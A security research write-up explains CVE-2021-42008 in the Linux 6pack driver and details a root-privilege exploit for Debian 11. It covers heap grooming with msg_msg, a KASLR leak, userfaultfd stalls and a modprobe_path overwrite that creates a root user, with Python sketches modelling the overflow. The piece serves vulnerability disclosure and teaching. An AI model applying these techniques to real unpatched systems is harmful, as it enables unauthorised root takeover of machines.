CVE-2021-42008 is a Slab-Out-Of-Bounds Write vulnerability in the Linux 6pack driver caused by a missing size validation check in the decode_data() function. Malicious input from a process with the CAP_NET_ADMIN capability can overflow the cooked_buf field of the sixpack structure, resulting in kernel memory corruption. This, if properly exploited, can lead to root access. In this article, after analyzing the vulnerability, we will exploit it using the techniques FizzBuzz101 and I presented in our recent articles Fire Of Salvation and Wall Of Perdition, bypassing all modern kernel protections. Then we will evaluate other approaches to perform privilege escalation.
Overview
6pack is a transmission protocol for data exchange between a PC and a TNC (Terminal Node Controller) over a serial line. It is used as an alternative to the KISS protocol for networking over AX.25. AX.25 is a data link layer protocol extensively used on amateur packet radio networks (and interestingly by some satellites, for example 3CAT2).
The vulnerability we are going to exploit was introduced by commit 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 with the introduction of the 6pack driver back in 2005. It was found by Syzbot and recently fixed by commit 19d1532a187669ce86d5a2696eb7275310070793. Every unpatched kernel version before 5.13.13 is affected.
As we mentioned in the introduction, the vulnerability is caused by a missing size validation check in the decode_data() function. Malicious input received over the sixpack channel from a process with the CAP_NET_ADMIN capability can cause decode_data() to be called multiple times by sixpack_decode(). The malicious input is subsequently decoded and stored into a buffer, cooked_buf, in the sixpack structure. The variable rx_count_cooked is used as an index into cooked_buf: it determines where a decoded byte must be written. The problem is that if decode_data() is called multiple times, rx_count_cooked is incremented over and over until it exceeds the size of cooked_buf, which can contain a maximum of 400 bytes. This can result in a Slab-Out-Of-Bounds Write vulnerability which, if properly exploited, can lead to root access.
To exploit the vulnerability, we are going to target one of the latest Debian 11 versions. It can be downloaded from here. The exploit is designed and tested for kernel 5.10.0-8-amd64. All modern protections, such as KASLR, SMEP, SMAP, PTI, CONFIG_SLAB_FREELIST_RANDOM, CONFIG_SLAB_FREELIST_HARDENED, CONFIG_HARDENED_USERCOPY etc. are enabled.
Analyzing The Vulnerable Driver
In modern Linux distributions, 6pack is usually compiled as a Loadable Kernel Module. The module can be loaded into the kernel by setting the line discipline of a tty to N_6PACK. To do so, we can simply create a ptmx/pts pair, respectively the master side and the slave side of a pty, and set the line discipline of the slave to N_6PACK:
After opening a ptmx and the respective slave side, we set the line discipline of the pts to N_6PACK [1] using the function set_line_discipline() [2].
Line discipline, also known as LDISC, acts as an intermediate level between a character device and a pseudo terminal (or real hardware), determining the semantics associated with the device.
For example, the line discipline is responsible for associating a special character like ^C, entered by the user in a terminal by pressing CTRL + C, with a specific signal, SIGINT in this case. To learn more about tty, pty, ptmx/pts and ldisc, I recommend reading The TTY demystified.
Once we set the pts line discipline to N_6PACK, the 6pack driver is initialized by sixpack_init_driver():
and tty_register_ldisc() is called to register the new line discipline [1]. The second argument, sp_ldisc, is defined as:
Afterwards the sixpack channel is opened by sixpack_open():
From the source code above, we can see that only a process with the CAP_NET_ADMIN capability is allowed to interact with the 6pack driver [1]. Fortunately, this makes the vulnerability not so easily exploitable in the wild.
Then, a net device is allocated using alloc_netdev() which is a macro for alloc_netdev_mqs() [2]:
As we can see from the alloc_netdev_mqs() source code, it first calculates the size of a net_device structure, 0x940 bytes in our case [2.1], and then adds the value of sizeof_priv to it, which corresponds to the size of a sixpack structure, 0x270 bytes in our case [2.2]. After the alignment padding is added, this results in an allocation of 0xbcf bytes, which will end up in kmalloc-4k [2.3].
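The arithmetic behind the 0xbcf figure can be checked with a short sketch. It assumes NETDEV_ALIGN is 32 and that alloc_netdev_mqs() aligns the net_device size, adds sizeof_priv and then adds NETDEV_ALIGN - 1 bytes of slack. The helper names are mine, and kmalloc_cache() is a simplification that only considers power-of-two caches.

```python
NETDEV_ALIGN = 32  # assumed value of the kernel constant


def align_up(value, alignment):
    """Round value up to the next multiple of alignment (a power of two)."""
    return (value + alignment - 1) & ~(alignment - 1)


def netdev_alloc_size(sizeof_net_device, sizeof_priv):
    """Size requested from the allocator for a net_device plus private data."""
    size = align_up(sizeof_net_device, NETDEV_ALIGN)  # net_device itself
    size += sizeof_priv                                # private area (struct sixpack)
    size += NETDEV_ALIGN - 1                           # slack for pointer alignment
    return size


def kmalloc_cache(size):
    """Smallest power-of-two kmalloc cache that fits size (ignores kmalloc-96/192)."""
    cache = 8
    while cache < size:
        cache *= 2
    return cache


alloc = netdev_alloc_size(0x940, 0x270)
print(hex(alloc), kmalloc_cache(alloc))  # 0xbcf 4096
```

With the sizes quoted above, the request is larger than 2048 bytes, which is why it lands in kmalloc-4k.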
Back to sixpack_open(): right after the call to alloc_netdev(), netdev_priv() is called. It sets the location of the sixpack structure inside the private data region of the previously allocated net device [3]. Finally, after setting the status field of the sixpack structure to 1 [4] and initializing two timers (the function called when the second timer expires, resync_tnc(), will be extremely important in the exploitation phase) [5], the tty line is linked to the sixpack channel [6], the net device is registered, and tnc_init() is called [7]:
Among other things, tnc_init() sets the expiration time of the sp->resync_t timer to jiffies + SIXP_RESYNC_TIMEOUT [1].
In the Linux Kernel, jiffies is a global variable that stores the number of ticks that have occurred since system boot. The value of this variable is incremented by one for each timer interrupt. In one second, there are HZ ticks (the value of HZ is determined by CONFIG_HZ). Since we know that HZ = number of ticks/sec and jiffies = number of ticks, we can simply convert jiffies to seconds, sec = jiffies/HZ, and seconds to jiffies, jiffies = sec*HZ.
This is exactly what the Linux Kernel does to determine when a timer expires. For example, a timer that expires 10 seconds from now can be represented in jiffies using jiffies + (10*HZ).
In our case, the timer is set to jiffies + SIXP_RESYNC_TIMEOUT. SIXP_RESYNC_TIMEOUT is equal to 5*HZ. This means that once the sixpack channel is initialized, the timer will expire after 5 seconds, triggering a call to resync_tnc(). We will analyze this function during the exploitation phase.
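As a quick illustration of the conversion, here is a minimal sketch. HZ = 250 is only an example value (the real one depends on CONFIG_HZ), and the helper names and the jiffies value are hypothetical.

```python
HZ = 250  # example value only; the real one comes from CONFIG_HZ

SIXP_RESYNC_TIMEOUT = 5 * HZ  # as stated in the text


def seconds_to_jiffies(seconds, hz=HZ):
    """jiffies = sec * HZ"""
    return seconds * hz


def jiffies_to_seconds(ticks, hz=HZ):
    """sec = jiffies / HZ"""
    return ticks / hz


def timer_expiry(now_jiffies, timeout=SIXP_RESYNC_TIMEOUT):
    """Absolute expiration time of a timer armed at now_jiffies."""
    return now_jiffies + timeout


now = 1_000_000  # hypothetical current value of jiffies
expires = timer_expiry(now)
print(expires - now, jiffies_to_seconds(expires - now))  # 1250 5.0
```

Whatever the value of HZ, the resync timer fires 5 seconds after it is armed. Only the number of ticks changes.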
Reaching The Vulnerable Function
Now that we can communicate with the sixpack driver, when we write to the ptmx, sixpack_receive_buf() is called, which in turn calls sixpack_decode():
The various macros are defined in 6pack.c:
#define SIXP_FOUND_TNC 0xe9
#define SIXP_PRIO_CMD_MASK 0x80
#define SIXP_PRIO_DATA_MASK 0x38
#define SIXP_RX_DCD_MASK 0x18
#define SIXP_DCD_MASK 0x08
sixpack_decode() will loop through the buffer we sent over the sixpack channel, now stored in pre_rbuff [1], and based on the value of each byte (inbyte), it will take different paths. To reach the vulnerable function, decode_data(), we must force sixpack_decode() to take the last path [4], and to do so, we need to satisfy multiple conditions:
A. inbyte & SIXP_PRIO_CMD_MASK must be zero, otherwise decode_prio_command() will be called instead of decode_data() [2].
B. inbyte & SIXP_STD_CMD_MASK must be zero, otherwise decode_std_command() will be called instead of decode_data() [3].
C. sp->status & SIXP_RX_DCD_MASK must be equal to SIXP_RX_DCD_MASK [4].
Since we control the value of each byte in our buffer, the first two conditions can be easily satisfied. The most complex one to satisfy is C.
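The three conditions can be summarized with a small model of the dispatch logic. This is a sketch rather than the driver code: SIXP_STD_CMD_MASK = 0x40 is not in the list of macros above and is my assumption, and dispatch() is a hypothetical helper that only returns the name of the function that would be called.

```python
SIXP_PRIO_CMD_MASK = 0x80
SIXP_STD_CMD_MASK = 0x40  # assumption: not listed among the macros above
SIXP_RX_DCD_MASK = 0x18


def dispatch(inbyte, status):
    """Name of the decoder that would handle inbyte for a given sp->status."""
    if inbyte & SIXP_PRIO_CMD_MASK:          # condition A violated
        return "decode_prio_command"
    if inbyte & SIXP_STD_CMD_MASK:           # condition B violated
        return "decode_std_command"
    if (status & SIXP_RX_DCD_MASK) == SIXP_RX_DCD_MASK:  # condition C
        return "decode_data"
    return "ignored"


print(dispatch(0x3F, 0x01))  # ignored: status is still 1 right after sixpack_open()
print(dispatch(0x3F, 0x18))  # decode_data
```

Under these assumptions, conditions A and B simply mean that data bytes must stay in the range 0x00-0x3f, while C depends on state we do not set directly.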
When a sixpack structure is initialized by sixpack_open(), the status variable is set to 1. Although we have no direct control over this variable, we can still indirectly modify it by taking the decode_prio_command() path [2]:
When decode_prio_command() is called, if we satisfy the first check [1], we can control sp->status by exploiting the line sp->status = cmd & SIXP_PRIO_DATA_MASK [4], which is exactly what we need since we control the value of cmd.
Easy, right? No. We have a problem. If the second check is satisfied [2], the SIXP_RX_DCD_MASK bits are zeroed out from our cmd variable by the line cmd &= ~SIXP_RX_DCD_MASK [3]. But since we need to satisfy condition C to reach the vulnerable function decode_data(), the second part of the second check, (cmd & SIXP_RX_DCD_MASK) == SIXP_RX_DCD_MASK [2], will inevitably be satisfied, and the same applies to the first part of the check, (sp->status & SIXP_DCD_MASK) == 0, since when decode_prio_command() is called for the first time, sp->status is equal to 1.
Fortunately, we can easily work around the problem by calling decode_prio_command() twice. The first time, we set sp->status to a value such that when decode_prio_command() is called again, the first part of the second check, (sp->status & SIXP_DCD_MASK) == 0 [2], is not satisfied. Then, calling decode_prio_command() again with a specific value as input, we will be able to skip the line cmd &= ~SIXP_RX_DCD_MASK [3] and set sp->status to a value that can satisfy condition C.
The following python script will compute the correct bytes for us:
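A minimal sketch of such a script is shown here. It models only the sp->status update described above, and next_status() and first_input() are names I chose for illustration. It brute-forces the smallest priority command byte for each of the two calls.

```python
SIXP_PRIO_DATA_MASK = 0x38
SIXP_RX_DCD_MASK = 0x18
SIXP_DCD_MASK = 0x08


def next_status(status, cmd):
    """Model only how decode_prio_command() updates sp->status."""
    if (cmd & SIXP_PRIO_DATA_MASK) == 0:   # check [1] fails: status is untouched
        return status
    if ((status & SIXP_DCD_MASK) == 0 and
            (cmd & SIXP_RX_DCD_MASK) == SIXP_RX_DCD_MASK):  # check [2]
        cmd &= ~SIXP_RX_DCD_MASK            # line [3]
    return cmd & SIXP_PRIO_DATA_MASK        # line [4]


def first_input(status, wanted_mask):
    """Smallest byte with bit 7 set after which status contains wanted_mask."""
    for cmd in range(0x80, 0x100):
        new_status = next_status(status, cmd)
        if (new_status & wanted_mask) == wanted_mask:
            return cmd, new_status
    raise ValueError("no suitable input found")


first = first_input(1, SIXP_DCD_MASK)             # start from status = 1
second = first_input(first[1], SIXP_RX_DCD_MASK)  # then aim for condition C

print("[*] First call to decode_prio_command():")
print(f"Input: {first[0]:#x} => s->status = {first[1]:#x}")
print("[*] Second call to decode_prio_command():")
print(f"Input: {second[0]:#x} => s->status = {second[1]:#x}")
```

In this model, sending 0x98 directly while sp->status is still 1 yields a status of 0, which is the problem described earlier.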
Executing the script above we will get the following result:
[*] First call to decode_prio_command():
Input: 0x88 => s->status = 0x8
[*] Second call to decode_prio_command():
Input: 0x98 => s->status = 0x18
It means that if decode_prio_command() is called the first time using 0x88 as input, sp->status will be set to 0x8. Then, calling the function again using 0x98 as input, the second check will not be satisfied [2] because sp->status will be equal to 8 and (8 & SIXP_DCD_MASK) != 0, so we will be able to skip the line cmd &= ~SIXP_RX_DCD_MASK [3] and set sp->status to 0x18 by exploiting the line sp->status = cmd & SIXP_PRIO_DATA_MASK [4].
At this point we can satisfy condition C, (sp->status & SIXP_RX_DCD_MASK) == SIXP_RX_DCD_MASK, in sixpack_decode(), and reach the vulnerable function decode_data(). Let’s proceed by examining its source code:
For our discussion, we also need to take into account the following fields of the sixpack structure:
Every time decode_data() is called, one byte is copied from our buffer to sp->raw_buf [1]. When sp->raw_buf contains three bytes and decode_data() is called again, these three bytes are decoded and copied from sp->raw_buf to another buffer, sp->cooked_buf [2]. As we can see from the sixpack structure above, this buffer can contain a maximum of 400 bytes. The variable sp->rx_count_cooked is used as an index into sp->cooked_buf and is incremented after each byte is written into it.
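The behaviour just described can be modelled in a few lines. This is a simplified sketch, not the driver code: the bit manipulation reflects my reading of the 6pack decoder and should be treated as an assumption, and instead of corrupting memory the model records every index past the end of cooked_buf in a hypothetical out_of_bounds list.

```python
COOKED_SIZE = 400


class Sixpack:
    """Only the receive-side fields discussed in the text."""

    def __init__(self):
        self.raw_buf = [0, 0, 0]
        self.cooked_buf = bytearray(COOKED_SIZE)
        self.rx_count = 0
        self.rx_count_cooked = 0
        self.out_of_bounds = []  # indexes the driver would write past the buffer


def decode_data(sp, inbyte):
    if sp.rx_count != 3:                 # collect three raw bytes first
        sp.raw_buf[sp.rx_count] = inbyte
        sp.rx_count += 1
        return
    b0, b1, b2 = sp.raw_buf              # the fourth byte triggers the decoding
    decoded = (
        (b0 | ((b1 << 2) & 0xC0)) & 0xFF,
        ((b1 & 0x0F) | ((b2 << 2) & 0xF0)) & 0xFF,
        ((b2 & 0x03) | (inbyte << 2)) & 0xFF,
    )
    for value in decoded:
        index = sp.rx_count_cooked       # note: never compared against 400
        if index < COOKED_SIZE:
            sp.cooked_buf[index] = value
        else:
            sp.out_of_bounds.append(index)
        sp.rx_count_cooked += 1
    sp.rx_count = 0


sp = Sixpack()
for _ in range(140 * 4):                 # 140 groups of four 6-bit symbols
    decode_data(sp, 0x3F)
print(sp.rx_count_cooked, sp.out_of_bounds[0], len(sp.out_of_bounds))  # 420 400 20
```

Four received symbols produce three decoded bytes, so 560 symbols are enough to push the index 20 bytes past the end of the buffer.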
From an attacker's perspective, knowing that your payload will pass through this function is not fun at all. Luckily, we can reuse some parts of the encode_sixpack() function in our exploit to encode the malicious payload. This way, once received by sixpack_decode(), it will be decoded by decode_data() and we will be able to control values in memory.
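To make the idea concrete, here is a sketch of the encoding step and its inverse. It is a simplification under my own assumptions: it covers only the packing of three bytes into four 6-bit symbols and leaves out the header bytes, TX delay and checksum handled by the real encode_sixpack(). The function names are mine.

```python
def encode_triple(a, b, c):
    """Pack three 8-bit values into four 6-bit symbols."""
    return (
        a & 0x3F,
        ((a >> 2) & 0x30) | (b & 0x0F),
        ((b >> 2) & 0x3C) | (c & 0x03),
        c >> 2,
    )


def decode_quad(s0, s1, s2, s3):
    """Inverse operation, mirroring what decode_data() is assumed to compute."""
    return (
        (s0 | ((s1 << 2) & 0xC0)) & 0xFF,
        ((s1 & 0x0F) | ((s2 << 2) & 0xF0)) & 0xFF,
        ((s2 & 0x03) | (s3 << 2)) & 0xFF,
    )


def encode_payload(payload):
    """Zero-pad to a multiple of 3 and encode every triple."""
    data = bytes(payload) + bytes(-len(payload) % 3)
    out = bytearray()
    for i in range(0, len(data), 3):
        out += bytes(encode_triple(*data[i:i + 3]))
    return bytes(out)


encoded = encode_payload(b"\xff\xff\x00\x11\x00\x00")
print(encoded.hex())
```

Every encoded symbol is below 0x40, so it clears conditions A and B on its way to decode_data(), and decoding returns the original bytes.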
Here is the encode_sixpack() part we are interested in:
Now that we know how to reach the vulnerable function, we can finally start planning our exploit.
Exploitation Plan
The first thing to consider is the layout of the sixpack structure in memory. Let’s take a look at its source code again:
As we can see, if we manage to overflow the cooked_buf array [1], we will inevitably overwrite the rx_count variable [2] and the rx_count_cooked variable [3] in memory.
Here is a visual representation:
We know that rx_count_cooked is used as an index into cooked_buf by decode_data(). Therefore, if we do the math correctly, we can use the overflow to set it to a large value. This way we should be able to trick decode_data() into continuing to write the decoded payload into the next object in memory.
Now, assuming we can achieve this goal, we need an object that we can spray in kmalloc-4k and that, once corrupted by our Out-Of-Bounds Write, can give us arbitrary read and arbitrary write. At this point, if you have read my latest article, you already know that msg_msg is exactly what we need:
In our recent articles, Fire Of Salvation and Wall Of Perdition, FizzBuzz101 and I have extensively discussed how to utilize msg_msg objects to achieve arbitrary read and arbitrary write. Before continuing, I recommend reading these articles to better understand how this object can be exploited. I will continue assuming you already know how msg_msg objects can be utilized in kernel exploitation.
If we manage to get a msg_msg object allocated next to the sixpack structure, and the respective segment allocated in kmalloc-32, we can corrupt the m_ts field of the message [1] (which determines its size) with our Out-Of-Bounds Write primitive, setting it to a large value. This way, using msgrcv(), we will be able to obtain an Out-Of-Bounds Read primitive in kmalloc-32, get an information leak and bypass KASLR.
Similarly, to achieve arbitrary write, we can spray many msg_msg objects in kmalloc-4k and their respective segments in kmalloc-32, then for each object we can suspend the call to copy_from_user() in load_msg() using userfaultfd (there are alternatives to userfaultfd, we will discuss them in the Conclusion section). Afterwards, once one of these messages is allocated right after our sixpack structure, we corrupt its next pointer [2], setting it to the address where we want to write.
In our exploit, we will target modprobe_path, but there are many other valid targets, for example the current task’s cred structure.
Once the copy_from_user() calls are released, we will be able to replace the modprobe_path string with the path of a malicious binary, and trick the kernel into executing the program that will give us root privileges.
At this point, with this plan in mind, we are ready to start writing our exploit!
The Exploit
First of all we need to do some calculations to get the distance between sp->cooked_buf and sp->rx_count_cooked, and the distance between sp->cooked_buf and the next object in memory. In our case, the address of sp->rx_count_cooked corresponds to sp->cooked_buf[0x194] and the address of the next object in memory corresponds to sp->cooked_buf[0x688].
Since we know that sp->rx_count_cooked is used as an index into sp->cooked_buf, if we want to write to the next object in memory, we need to set its value to x, where x >= 0x688.
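Both distances can be reproduced with a rough sketch based on ctypes. The field list is my assumption about the leading members of the sixpack structure on x86-64 (pointers modelled as 64-bit integers). The sketch also assumes that the net_device allocation starts at the beginning of a 0x1000-byte kmalloc-4k object and that the private area begins 0x940 bytes into it. On other kernels these numbers will differ.

```python
import ctypes


class Sixpack(ctypes.Structure):
    # Assumed leading fields of struct sixpack (x86-64 layout).
    _fields_ = [
        ("tty", ctypes.c_uint64),
        ("dev", ctypes.c_uint64),
        ("rbuff", ctypes.c_uint64),
        ("rcount", ctypes.c_int32),
        ("xbuff", ctypes.c_uint64),
        ("xhead", ctypes.c_uint64),
        ("xleft", ctypes.c_int32),
        ("raw_buf", ctypes.c_uint8 * 4),
        ("cooked_buf", ctypes.c_uint8 * 400),
        ("rx_count", ctypes.c_uint32),
        ("rx_count_cooked", ctypes.c_uint32),
    ]


SLAB_OBJECT_SIZE = 0x1000  # kmalloc-4k
PRIV_OFFSET = 0x940        # sizeof(struct net_device) quoted earlier

cooked = Sixpack.cooked_buf.offset
index_of_count = Sixpack.rx_count_cooked.offset - cooked
index_of_next_object = SLAB_OBJECT_SIZE - (PRIV_OFFSET + cooked)

print(hex(index_of_count), hex(index_of_next_object))  # 0x194 0x688
```

Under these assumptions the sketch yields the same two indexes, which is a useful sanity check when porting the offsets to another build.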
Again: easy, right? No. We need to consider the effect of GCC optimizations on the vulnerable function decode_data():
The first important thing to note is that, predictably, when decode_data() is called and sp->raw_buf contains 3 bytes, GCC optimizes the access to sp->rx_count_cooked: instead of accessing its value multiple times during the write procedure, the value is loaded into EAX [1] and then moved to RCX [2] at the beginning of the function.
The second important thing is that instead of three consecutive write operations in sp->cooked_buf, before writing the third decoded byte [6], the value of sp->rx_count_cooked is updated with its previously stored [1] [2] value + 3 [5].
This optimization makes things harder, because if we manage to overwrite the first two bytes of sp->rx_count_cooked thanks to the instructions [3] and [4], before overwriting the third byte [6], its value will be updated by instruction [5]. It means that we need to try to use the third write operation [6] to overwrite the second byte of sp->rx_count_cooked, which corresponds to sp->cooked_buf[0x195], for example making it 0x06XX instead of 0x01XX.
Since decode_data() writes 3 bytes at a time starting from index 0 into sp->cooked_buf, each time decode_data() is called, the third byte will be written at index 0x2, 0x5, 0x8, …, 0x191, 0x194 and so on. Basically, when sp->rx_count_cooked is 0x192 and decode_data() is called again, the third write operation will be performed over sp->cooked_buf[0x194], but with the third decoded byte we need to overwrite sp->cooked_buf[0x195]! Oh, lovely GCC optimizations…
The problem can be solved by misaligning the writing frame: setting the first byte of sp->rx_count_cooked to 0x90, so it will become 0x190. This way, after two more calls to decode_data(), the third write operation will be performed over sp->cooked_buf[0x195].
Each time decode_data() is called, we basically have a pattern of three operations:
- First, when sp->rx_count_cooked is equal to 0x192 and decode_data() is called again, it writes the first two bytes with instructions [3] and [4] at sp->cooked_buf[0x192] and sp->cooked_buf[0x193] respectively.
- Then instruction [5] updates sp->rx_count_cooked with its previously stored value + 3: 0x192 + 3 = 0x195.
- And finally the third write operation [6] overwrites the first byte of sp->rx_count_cooked, which corresponds to sp->cooked_buf[0x194], making it 0x190.
Here is a visual representation:
Now sp->rx_count_cooked is equal to 0x190, and we have successfully misaligned the writing frame. When decode_data() is called again, we have the same pattern of operations:
- Write two bytes inside sp->cooked_buf (this time at sp->cooked_buf[0x190] and sp->cooked_buf[0x191])
- Update sp->rx_count_cooked with its previously stored value + 3 (this time 0x190 + 3 = 0x193)
- Write the third byte (this time at sp->cooked_buf[0x192]):
And again, a new call to decode_data() will finally set sp->rx_count_cooked to 0x696. The pattern is always the same:
- Write two bytes inside sp->cooked_buf (this time at sp->cooked_buf[0x193] and sp->cooked_buf[0x194])
- Update sp->rx_count_cooked with its previously stored value + 3 (this time 0x193 + 3 = 0x196)
- Write the third byte (this time at sp->cooked_buf[0x195]):
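The three rounds traced above can be replayed in a small model. It is a sketch under stated assumptions: memory is a flat bytearray starting at sp->cooked_buf, sp->rx_count_cooked is a little-endian 32-bit value stored at index 0x194, and each round performs its stores in the order described for the optimized build (two bytes, index update, third byte). The 0x41 filler bytes and the function names are mine.

```python
import struct

COUNT_OFF = 0x194  # sp->rx_count_cooked aliases cooked_buf[0x194..0x197]


def read_count(mem):
    return struct.unpack_from("<I", mem, COUNT_OFF)[0]


def write_triple(mem, b0, b1, b2):
    """One decoding round with the store order of the optimized function."""
    idx = read_count(mem)                            # [1] [2] cached index
    mem[idx] = b0                                    # [3]
    mem[idx + 1] = b1                                # [4]
    struct.pack_into("<I", mem, COUNT_OFF, idx + 3)  # [5]
    mem[idx + 2] = b2                                # [6]


mem = bytearray(0x1000)       # cooked_buf and whatever follows it
for _ in range(0x192 // 3):   # 134 harmless rounds bring the index to 0x192
    write_triple(mem, 0x41, 0x41, 0x41)

trace = [read_count(mem)]
write_triple(mem, 0x41, 0x41, 0x90)  # third byte hits cooked_buf[0x194]
trace.append(read_count(mem))
write_triple(mem, 0x41, 0x41, 0x41)  # misaligned round
trace.append(read_count(mem))
write_triple(mem, 0x41, 0x41, 0x06)  # third byte hits cooked_buf[0x195]
trace.append(read_count(mem))

print([hex(v) for v in trace])  # ['0x192', '0x190', '0x193', '0x696']
```

The next round then starts writing at index 0x696, well past the 0x688 boundary computed earlier.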
This will trick decode_data() into continuing to write the payload 0x0e bytes inside the next object in memory. At this point we can start writing our exploit:
Since we are working in an SMP environment and, with the SLUB allocator, active slabs are managed per-cpu (see kmem_cache_cpu), we need to make sure to always operate on the same processor to maximize the success rate of our exploit. We can do this by assigning the current process to core 0 [1] using sched_setaffinity() [2], which is usable by unprivileged users.
Then we call prepare_exploit() to prepare everything we need to exploit modprobe [3] (check References to learn more about this technique or read my Hotrod writeup). As you can see, once executed by the kernel, the program will add a new user with root privileges [4].
We can continue by spraying many shm_file_data structures in kmalloc-32:
This can be done using shmget() to allocate a shared memory segment and shmat() to attach it to the address space of the calling process [1]. This, later on, will allow us to leak the init_ipc_ns symbol, located in the kernel data section, calculate the kernel base address, and bypass KASLR.
Afterwards, we allocate N_MSG (in this case N_MSG is equal to 6) message queues [2] and then for each queue we send a message of 0x1018 bytes (0xfe8 bytes for the message body, and 0x30 for the message header) using send_msg() [3], a msgsnd() wrapper. Each iteration will allocate a message in kmalloc-4k and a segment in kmalloc-32.
PS: Here I only used 6 messages because the testing environment was virtually noiseless. On other systems you may want to use more message queues and spray more messages to saturate kmalloc-4k partial slabs first.
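To see why a 0xfe8-byte body produces one kmalloc-4k object and one kmalloc-32 segment, the split can be sketched as follows. It assumes a 4096-byte page, the 0x30-byte msg_msg header mentioned above and an 8-byte msg_msgseg header (a single next pointer). msg_allocations() is a hypothetical helper, not a kernel function.

```python
PAGE_SIZE = 0x1000
MSG_MSG_HDR = 0x30     # sizeof(struct msg_msg), as stated in the text
MSG_MSGSEG_HDR = 0x8   # assumed sizeof(struct msg_msgseg): one next pointer


def msg_allocations(body_len):
    """Allocation sizes for one message body: head object first, then segments."""
    first = min(body_len, PAGE_SIZE - MSG_MSG_HDR)
    sizes = [MSG_MSG_HDR + first]
    remaining = body_len - first
    while remaining > 0:
        chunk = min(remaining, PAGE_SIZE - MSG_MSGSEG_HDR)
        sizes.append(MSG_MSGSEG_HDR + chunk)
        remaining -= chunk
    return sizes


print([hex(size) for size in msg_allocations(0xFE8)])  # ['0x1000', '0x20']
```

The head object holds the header plus the first 0xfd0 bytes of the body. The remaining 0x18 bytes, together with the 8-byte segment header, fit exactly in a 32-byte object.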
Then we use recv_msg(), a msgrcv() wrapper, to read a message and create a hole in the kernel heap [4]. At this point we can finally initialize the sixpack channel as we have seen in the first section [5]. This will allocate a net_device structure in kmalloc-4k and a sixpack structure inside its private data region.
All this will create the following situation in memory, where the sixpack structure is followed by one of the messages. This message contains a pointer to its respective segment in kmalloc-32:
It is important to note that we don’t know which queue the message allocated after the sixpack structure belongs to, so I identified the queue with QID #X.
We are finally ready to send our malicious payload over the sixpack channel:
We generate and encode our malicious payload by calling generate_payload() [1]. As we have seen in the previous paragraphs, we misalign the writing frame of the decode_data() function by setting sp->rx_count_cooked to 0x190 [2]. We overwrite the second byte of sp->rx_count_cooked with 0x6, making it 0x696 [3]. From this point on, decode_data() will continue writing data at sp->cooked_buf[0x696], and by doing so it will inevitably corrupt the two upper bytes of the msg_msg.m_list.prev pointer. Since we know that the two upper bytes of a heap pointer in kernel space are always 0xffff, we can easily fix the issue [4].
Then we set msg_msg.m_ts to 0x1100 [5]. This will allow us to obtain an Out-Of-Bounds Read primitive by calling recv_msg(). For now we don’t need to overwrite msg_msg.next [6], so we can directly encode our buffer [7] and set the first two bytes of the payload to 0x88 and 0x98 respectively, to reach the vulnerable function. Since we are skipping the first two bytes, we set sp->rx_count to 2 in sixpack_encode() [8].
Once we send our malicious payload over the sixpack channel [9], it will be decoded by sixpack_decode(), resulting in the following situation in memory:
We have successfully overwritten sp->rx_count_cooked with 0x696 by exploiting the buffer overflow in sp->cooked_buf, and tricked decode_data() into writing our malicious payload at sp->cooked_buf[0x696]. By doing so, we have successfully overwritten the m_ts field of the message. Here is the result of our Out-Of-Bounds Write primitive shown in GDB:
We can proceed exploiting the Out-Of-Bounds Read:
Since we don’t know which queue the message allocated after the sixpack structure belongs to, we use leak_pointer() [1] to read each message until the init_ipc_ns pointer is found [2]. If we find the pointer, we obtain the correct queue id by comparing the message content using find_message_queue() [3], and we finally compute the address of modprobe_path [4]. If the procedure fails, it means that none of our messages has been allocated after the sixpack structure. In this case we can simply launch the exploit again.
Here is a visual representation of what happens when we trigger the Out-Of-Bounds Read:
Now that we know the address of our target, modprobe_path, we need to get an arbitrary write primitive. We could proceed by initializing a new sixpack structure, but this would decrease the success rate of our exploit.
The question is: is there a way to reuse the sixpack structure we just corrupted? The answer is yes! Remember when we analyzed the tnc_init() function? Well, when a new sixpack channel is initialized, tnc_init() sets a timer of 5 seconds. When the timer fires, resync_tnc() is called:
As we can see, after 5 seconds, the receiver state is reset, meaning that sp->rx_count and sp->rx_count_cooked are set to 0 [1] [2] and sp->status to 1 [3], then the 5 seconds timer is re-initialized [4].
This means that we only need to wait 5 seconds until the receiver state is reset, then we will be able to reuse the structure to cause a second Out-Of-Bounds Write.
We can proceed by initializing N_THREADS page fault handler threads (in our case N_THREADS is equal to 8):
First, we call mmap() 8 times, and each time we map 3 pages of memory. For each iteration we start monitoring the second page using userfaultfd [1]. Then, we start 8 page fault handlers [2]. Each of these threads will handle a page fault for a specific page.
We can proceed allocating 8 messages in kmalloc-4k and the respective segments in kmalloc-32:
First, we free the message allocated after the sixpack structure and its respective segment by closing the queue [1]. This will create a hole in the heap, allowing us to allocate another message at the same location (because of freelist LIFO behavior). We re-generate our malicious payload, this time using modprobe_path - 0x8 as target [2]. This will set the msg_msg.next pointer to modprobe_path - 0x8. Here we are subtracting 8 bytes from modprobe_path because the first QWORD of a segment must be NULL, otherwise load_msg() will try to access the next segment, causing a crash.
Afterwards, we create 8 threads using create_message_thread() [3]. Each one of these threads will allocate a new message in kmalloc-4k. For each thread, we place the message buffer exactly 0x10 bytes before the monitored page [4]. This way the copy_from_user() call in load_msg() will cause a page fault, and we will be able to suspend the copy operation. Finally we sleep for 6 seconds [5], allowing resync_tnc() to reset the sixpack receiver state. All this will cause the following situation in memory:
As we can see, one of the messages has been allocated right after the sixpack structure. load_msg() caused a page fault, and we successfully suspended the copy operation. It is important to note that even in this case we don’t know which queue the message allocated after the sixpack structure belongs to, so I identified the queue with QID #Y.
We are ready to send our malicious payload over the sixpack channel:
Once we send it [1], it will overwrite multiple fields of the msg_msg structure, including the next pointer. Now msg_msg->next points to modprobe_path - 0x8:
We can finally release all page faults:
The modprobe_path string will be overwritten with the path of our malicious program, "/tmp/x":
In the final stage, we trigger the call to modprobe, and we verify if the new user with root privileges has been added:
First we execute a program with an unknown program header [1], forcing the kernel to call __request_module() → call_modprobe() → call_usermodehelper_exec() and execute our malicious program. Then we check if the user pwn [2] has been added using getpwnam(). If the user exists, we can use su pwn to become root, otherwise we simply need to launch the exploit again.
Here is the exploit in action:
The complete exploit can be found here:
CVE-2021-42008: Exploiting A 16-Year-Old Vulnerability In The Linux 6pack Driver
The exploit is designed and tested for Debian 11 - Kernel 5.10.0-8-amd64. If you want to port the exploit to other kernel versions, remember that the distance between sp->cooked_buf and the next object in memory may change.
Conclusion
In this article I showed how the techniques presented by FizzBuzz101 and me in Fire of Salvation and Wall Of Perdition can be used to exploit real vulnerabilities in the Linux Kernel.
